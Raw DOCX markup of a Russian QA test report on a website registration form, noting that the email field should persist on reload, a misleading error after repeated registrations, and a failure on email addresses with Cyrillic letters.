      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотреть возможность сохранения поля email при перезагрузке страницы, при этом поле пароля должно очищаться из соображений безопасности.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Комментарий: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">На главной странице в форме регистрации все поля после перезагрузки остаются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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В целом процесс регистрации простой и интуитивно понятный.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Ps: </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Bug на главной странице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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> После большого количества обращений к форме регистрации появляется некорректная ошибка.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Произвести регистрацию 20 раз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результат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Ошибка соединения. Попробуйте позже.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Доступ с ip адреса &lt;******&gt; запрещён. Обратитесь в службу поддержки.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color w:val="1d1d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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minor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color w:val="1d1d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76913" cy="247774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2873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247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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистрация с почтой имеющей русские буквы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Ввести Тест_selectel@mail.ru</w:t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d1d1f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Ввести валидный пароль</w:t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1d1d1f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Нажать на кнопку регистрации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результат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Ошибка соединения. Попробуйте позже.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валидации.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color w:val="1d1d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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Major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left"/>
        <w:rPr/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118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files.selectel.ru/docs/ru/user-agreement.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://files.selectel.ru/docs/ru/user-agreement.pdf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iles.selectel.ru/docs/ru/user-agreement.pdf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5.png"/><Relationship Id="rId18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hyperlink" Target="https://files.selectel.ru/docs/ru/user-agreemen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